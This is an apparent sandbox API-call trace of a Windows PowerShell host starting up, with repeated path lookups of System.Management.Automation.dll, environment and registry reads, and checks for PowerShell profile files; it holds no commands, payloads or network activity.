	[0295.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.883] VirtualQuery (in: lpAddress=0x26b7f0, lpBuffer=0x26c6b0, dwLength=0x30 | out: lpBuffer=0x26c6b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.885] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0295.885] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.885] CoTaskMemFree (pv=0x517f40) 
	[0295.887] VirtualQuery (in: lpAddress=0x26b7f0, lpBuffer=0x26c6b0, dwLength=0x30 | out: lpBuffer=0x26c6b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.602] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0296.602] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.602] CoTaskMemFree (pv=0x517f40) 
	[0296.603] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0296.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.603] CoTaskMemFree (pv=0x517f40) 
	[0296.603] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0296.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.603] CoTaskMemFree (pv=0x517f40) 
	[0296.604] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0296.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.604] CoTaskMemFree (pv=0x517f40) 
	[0296.608] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0296.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.608] CoTaskMemFree (pv=0x517f40) 
	[0296.609] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0296.609] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.609] CoTaskMemFree (pv=0x517f40) 
	[0296.613] VirtualQuery (in: lpAddress=0x26b7f0, lpBuffer=0x26c6b0, dwLength=0x30 | out: lpBuffer=0x26c6b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.613] VirtualQuery (in: lpAddress=0x26b7f0, lpBuffer=0x26c6b0, dwLength=0x30 | out: lpBuffer=0x26c6b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.302] VirtualQuery (in: lpAddress=0x26b7f0, lpBuffer=0x26c6b0, dwLength=0x30 | out: lpBuffer=0x26c6b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.304] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0297.304] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.304] CoTaskMemFree (pv=0x517f40) 
	[0298.845] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x518380
	[0298.848] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x518490
	[0303.120] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0303.120] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.120] CoTaskMemFree (pv=0x5185a0) 
	[0303.122] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0303.122] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.122] CoTaskMemFree (pv=0x5185a0) 
	[0303.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.136] VirtualQuery (in: lpAddress=0x26baa0, lpBuffer=0x26c960, dwLength=0x30 | out: lpBuffer=0x26c960*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0303.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.140] VirtualQuery (in: lpAddress=0x26baa0, lpBuffer=0x26c960, dwLength=0x30 | out: lpBuffer=0x26c960*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0303.140] VirtualQuery (in: lpAddress=0x26b2f0, lpBuffer=0x26c1b0, dwLength=0x30 | out: lpBuffer=0x26c1b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0303.140] VirtualQuery (in: lpAddress=0x26b2f0, lpBuffer=0x26c1b0, dwLength=0x30 | out: lpBuffer=0x26c1b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0303.141] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d8f8 | out: phkResult=0x26d8f8*=0x2e0) returned 0x0
	[0303.141] RegQueryValueExW (in: hKey=0x2e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d87c, lpData=0x0, lpcbData=0x26d878*=0x0 | out: lpType=0x26d87c*=0x1, lpData=0x0, lpcbData=0x26d878*=0x56) returned 0x0
	[0303.141] CoTaskMemAlloc (cb=0x5a) returned 0x1b8bc9b0
	[0303.141] RegQueryValueExW (in: hKey=0x2e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d84c, lpData=0x1b8bc9b0, lpcbData=0x26d848*=0x56 | out: lpType=0x26d84c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d848*=0x56) returned 0x0
	[0303.141] CoTaskMemFree (pv=0x1b8bc9b0) 
	[0303.141] RegCloseKey (hKey=0x2e0) returned 0x0
	[0303.142] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d8f8 | out: phkResult=0x26d8f8*=0x2e0) returned 0x0
	[0303.142] RegQueryValueExW (in: hKey=0x2e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d87c, lpData=0x0, lpcbData=0x26d878*=0x0 | out: lpType=0x26d87c*=0x1, lpData=0x0, lpcbData=0x26d878*=0x56) returned 0x0
	[0303.142] CoTaskMemAlloc (cb=0x5a) returned 0x1b8bc9b0
	[0303.142] RegQueryValueExW (in: hKey=0x2e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d84c, lpData=0x1b8bc9b0, lpcbData=0x26d848*=0x56 | out: lpType=0x26d84c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d848*=0x56) returned 0x0
	[0303.142] CoTaskMemFree (pv=0x1b8bc9b0) 
	[0303.142] RegCloseKey (hKey=0x2e0) returned 0x0
	[0303.142] CoTaskMemAlloc (cb=0x20c) returned 0x1b890970
	[0303.142] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b890970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0303.143] CoTaskMemFree (pv=0x1b890970) 
	[0303.143] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0303.143] CoTaskMemAlloc (cb=0x20c) returned 0x1b890970
	[0303.143] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b890970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0303.143] CoTaskMemFree (pv=0x1b890970) 
	[0303.143] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0303.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0303.145] SetErrorMode (uMode=0x1) returned 0x1
	[0303.145] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d860 | out: lpFileInformation=0x26d860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.145] SetErrorMode (uMode=0x1) returned 0x1
	[0303.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0303.145] SetErrorMode (uMode=0x1) returned 0x1
	[0303.145] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d860 | out: lpFileInformation=0x26d860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.145] SetErrorMode (uMode=0x1) returned 0x1
	[0303.145] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0303.146] SetErrorMode (uMode=0x1) returned 0x1
